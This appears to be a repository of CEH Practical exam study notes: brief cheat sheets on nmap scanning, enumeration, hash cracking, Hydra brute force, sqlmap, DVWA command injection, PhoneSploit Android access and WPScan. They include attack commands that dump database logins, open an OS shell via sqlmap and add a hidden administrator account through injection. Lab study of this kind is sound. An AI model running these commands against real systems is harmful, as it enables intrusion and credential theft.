├── Android
├── CEH-Prac Guide
├── Command Injection DVWA
├── Cryptography
├── Enumeration
├── Enumeration Domain Users
├── SQL Injection
├── Scanning Nmap
├── Stegnography
├── WireShark DDOS
└── WordPress Brusteforce


/Android:
--------------------------------------------------------------------------------
 1 | PhoneSploit
 2 | https://n00bie.medium.com/hacking-android-using-phonesploit-ffbb2a899e6
 3 | 
 4 | apt-get install adb
 5 | git clone github.com/01010000/phonesploit
 6 | cd phonesploit
 7 | pyhton3 phonesploit.py
 8 | 3 (Connect to new phone)
 9 | Add IP address of android device
10 | 4 (Access shell on phone)
11 | IP address again of android device
12 | pwd
13 | ls
14 | cd sdcard
15 | ls
16 | cd downloads
17 | cat accnt-info.txt
18 | 


--------------------------------------------------------------------------------
/CEH-Prac Guide:
--------------------------------------------------------------------------------
 1 | Guide for CEH-Practical Exam
 2 | 
 3 | The file contains the Cmd's, Tools and Examples to crack the respective challenges.
 4 | 
 5 | Gitbook Guide
 6 | https://github.com/CyberSecurityUP/Guide-CEH-Practical-Master
 7 | https://adithyanak.gitbook.io/ceh-practical/
 8 | https://github.com/Samson-DVS/CEH-Practical-Notes  (Very-useful)
 9 | https://github.com/nirangadh/ceh-practical         (Very-useful)
10 | https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html  (SMB Checklist Enumeration)
11 | https://github.com/Samsar4/Ethical-Hacking-Labs
12 | https://github.com/Rezkmike/CEH_Practical_Preparation (very-useful tools)
13 | https://nx7.me/posts/cehreview/
14 | https://chirag-singla.notion.site/CEH-Practical-Preparation-7f2b77651cd144e8872f2f5a30155052
15 | 
16 | IMP
17 | https://github.com/System-CTL/CEH_CHEAT_SHEET
18 | 


--------------------------------------------------------------------------------
/Command Injection DVWA:
--------------------------------------------------------------------------------
 1 | Login to DVWA
 2 | Set the Security Level "Low"
 3 | Click on the Command Injection Tab 
 4 | Check the parameter is vulnerable or not and it is vulnerable 
 5 | Now enter the system cmd's
 6 | | hostname
 7 | | whoami
 8 | | dir C:\path.txt
 9 | | type path.txt
10 | 
11 | | net user
12 | | net user Test /Add
13 | | net user
14 | | net user Test
15 | | net localgroup Administrators Test /Add
16 | 
17 | Succefully created the "Test" user account.
18 | 


--------------------------------------------------------------------------------
/Cryptography:
--------------------------------------------------------------------------------
 1 | Hash identifier and Hash cracking
 2 | 
 3 | Hash Identifier
 4 | https://www.onlinehashcrack.com/hash-identification.php
 5 | 
 6 | Hash-identifier (CLI)
 7 | 
 8 | Hash Crack
 9 | https://crackstation.net/
10 | https://hashes.com/en/decrypt/hash
11 | 
12 | Hashcat -a 3 -m 900 hash.txt /rockyou.txt
13 | 
14 | -a attack mode
15 | -m hashtype
16 | 900 md4
17 | 1000 NTLM
18 | 1800 SHA512CRYPT
19 | 110 SHA1 with SALT HASH
20 | 0  MD5
21 | 100 SHA1
22 | 1400 SHA256
23 | 3200 BCRYPT
24 | 160 HMAC-SHA1
25 | 
26 | John 
27 | 1. First analyze hash type - `john hashfile.hash`
28 | 2. Then crack hash - `john hashfile.hash --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA1`
29 | 3. Show the cracked password - `john --show --format=Raw-SHA1 hashfile.hash` OR `john --show hashfile.hash
30 | 
31 | 
32 | Hydra
33 | 
34 | - **FTP**: hydra -l user -P passlist.txt [ftp://10.10.46.122](ftp://10.10.46.122/)
35 |     
36 |             hydra -L userlist.txt -P passlist.txt [ftp://10.10.46.122](ftp://10.10.46.122/)
37 |     
38 | - SSH: hydra -l <username> -P <full path to pass> 10.10.46.122 -t 4 ssh
39 | - Post Web Form: hydra -l <username> -P <wordlist> 10.10.46.122 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V
40 | 
41 | - `hydra -L /root/Desktop/Wordlists/Usernames.txt -P /root/Desktop/Wordlists/Passwords.txt ftp://[IP]`
42 | - `hydra -l root -P passwords.txt [-t 32] <IP> ftp
43 | - `hydra -L usernames.txt -P pass.txt <IP> mysql
44 | - `hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V`
45 | - `hydra -V -f -L <userslist> -P <passwlist> ***rdp***://<IP>`
46 | - `hydra -P common-snmp-community-strings.txt target.com snmp
47 | - `hydra -l Administrator -P words.txt 192.168.1.12 smb t 1
48 | - `hydra -l root -P passwords.txt <IP> ssh
49 | 


--------------------------------------------------------------------------------
/Enumeration:
--------------------------------------------------------------------------------
 1 | SNMP Enumeration
 2 | 
 3 | nmap -sU -P 161 IP
 4 | snmp-check IP
 5 | Displays Network Info, Network Interfaces, Network IP, Routing Info, TCP connection and listening, process, Storage info, File System and Device Info.
 6 | 
 7 | 
 8 | NetBios Enumeration
 9 | 
10 | nbstat -a IP
11 | -a netbios name table
12 | -c list contents of Netbios name cache
13 | 
14 | net use
15 | Displays connection status, Shared folder/drive and Network Information.
16 | 
17 | 


--------------------------------------------------------------------------------
/Enumeration Domain Users:
--------------------------------------------------------------------------------
1 | NET USERS /DOMAIN >USERS.TXT
2 | Domain: TEST.local
3 | User Enumeration:
4 |   Windows:
5 |     net user
6 |     net user /domain
7 |     net user [username]
8 |     net user [username] /domain
9 | 


--------------------------------------------------------------------------------
/SQL Injection:
--------------------------------------------------------------------------------
 1 | OWASP ZAP
 2 | Open the ZAP 
 3 | Add the webiste name to Autoscan
 4 | Click on the Alert tab to know about Vulnerabilities
 5 | 
 6 | ---------------------------------------------------------------------------------------------------------------------------------------------------------
 7 | 
 8 | SQL MAP
 9 | 
10 | Open the vulnerable website 
11 | Copy the cookie from the inspect element
12 | Open the terminal to use sqlmap 
13 | sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl="; --dbs
14 | sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=; ui-tabs-1=0" -D moveiscope --tables
15 | sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=; ui-tabs-1=0" -D moviescope -T user-Login --dump
16 | 
17 | You will get all the Useraname and Passwords of the website.
18 | 
19 | ------------------------------------------------------------------------------------------------------------------------------------------------------
20 | 
21 | sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=; ui-tabs-1=0" --os-shell
22 | It opens up the Interactive OS shell.
23 | 
24 | -------------------------------------------------------------------------------------------------------------------------------------------------------
25 | 
26 | mysql -U qdpmadmin -h 192.168.1.8 -P passwod 
27 | show databases;
28 | use qdpm;
29 | show tables'
30 | select * from users;
31 | show dtabases;
32 | use staff;
33 | show tables;
34 | select * from login;
35 | select * from user;
36 | 
37 | When you have username and Password for the database.
38 | 
39 | -------------------------------------------------------------------------------------------------------------------------------------------------------
40 | 
41 | 
42 | 
43 | 
44 | 
45 | 
46 | 
47 | 
48 | 
49 | 
50 | 
51 | 
52 | 
53 | 
54 | 
55 | 


--------------------------------------------------------------------------------
/Scanning Nmap:
--------------------------------------------------------------------------------
 1 | nmap -sn 10.10.10.10/24 -oN nmap.txt
 2 | nmap -sC -sV -sS -O 10.10.10.11 -oN nmap.txt
 3 | nmap -A 10.10.10.10/24 -oN nmap.txt
 4 | 
 5 | nmap -sn -O 172.16.43.1/24 
 6 | nmap -sS -sC -sV -O 172.16.43.3 -oN nmap.txt
 7 | nmap 172.16.43.1/24
 8 | 
 9 | nmap -sV -sC -pA nmap 10.10.10.x
10 | nmap -sC -sV -v -oN nmap.txt 10.10.10.10
11 | nmap -sU -sV -A t4 -v -oN udp.txt 10.10.10.1
12 | 
13 | nmap -f IP
14 | nmap -sn -PR IP
15 | nmap -sn -PE ip-range
16 | nmap -sn 10.10.10.10/24
17 | nmap -sC -sS -sV -O IP
18 | nmap -A IP
19 | 
20 | -sn disable port scan
21 | -PR ARP ping scan
22 | -PU UDP ping scan
23 | -PE ICMP ECHO ping scan
24 | -f  Splits IP into fragment packets
25 | 
26 | nmap --script smb-os-discovery.nse IP 
27 | Displays OS, Computer-Name, Domain, WorkGroup and Ports.
28 | 
29 | 


--------------------------------------------------------------------------------
/Stegnography:
--------------------------------------------------------------------------------
1 | snow.exe -C -p "test" confidential.txt
2 | 
3 | -C  compressing / uncompressing
4 | -p  password
5 | 
6 | 
7 | Open Stego 
8 | GUI tool
9 | 


--------------------------------------------------------------------------------
/WireShark DDOS:
--------------------------------------------------------------------------------
1 | https://www.comparitech.com/net-admin/wireshark-cheat-sheet/
2 | https://www.hackers-arise.com/post/2018/09/27/network-forensics-part-2-detecting-and-analyzing-a-scada-dos-attack
3 | 
4 | To find DOS (SYN and ACK) : tcp.flags.syn == 1  , tcp.flags.syn == 1 and tcp.flags.ack == 0
5 | To find passwords : http.request.method == POST
6 | 
7 | 


--------------------------------------------------------------------------------
/WordPress Brusteforce:
--------------------------------------------------------------------------------
1 | wpscan --url http://172.16.0.27:8080/CEH/ -u james -P /path/pass.txt
2 | wpscan --url https://example/ --enumerate u (To enumerate the user)
3 | 


--------------------------------------------------------------------------------